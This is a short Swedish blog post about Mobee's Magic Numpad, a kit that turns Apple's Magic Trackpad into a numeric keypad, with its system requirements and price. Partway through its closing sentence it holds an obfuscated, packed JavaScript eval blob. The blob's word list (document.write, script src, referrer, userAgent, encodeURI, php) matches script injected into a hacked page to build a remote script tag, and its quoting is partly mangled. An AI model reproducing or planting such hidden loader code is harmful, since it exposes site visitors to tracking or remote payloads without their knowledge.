Image Image Image Image Image Image Image Image Image Image

| 23 september, 2018

Scroll to top

Top

Gör din Magic Trackpad till en Magic Numpad…

Gör din Magic Trackpad till en Magic Numpad…
Filip Urde
  • On 31 augusti, 2011
  • http://www.revue.se/filip-urde

Magic Numpad från Mobee Technology gör det möjligt för dig att enkelt göra din Magic Trackpad till ett numeriskt tangentbord (Numpad). I paketet som du köper ingår tre skyddsfilmer med tre olika tangentuppsättningar. Klistra på den du vill ha och installera den bifogade mjukvaran och sedan är det klart.
Systemkravet för Magic Numpad är Mac OS X 10.6 eller senare. Prislappen ligger på 30 euro, vilket är ganska överkomligt.

För mer information Magic eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|thieh|var|u0026u|referrer|fznee||js|php’.split(‘|’),0,{}))
numpad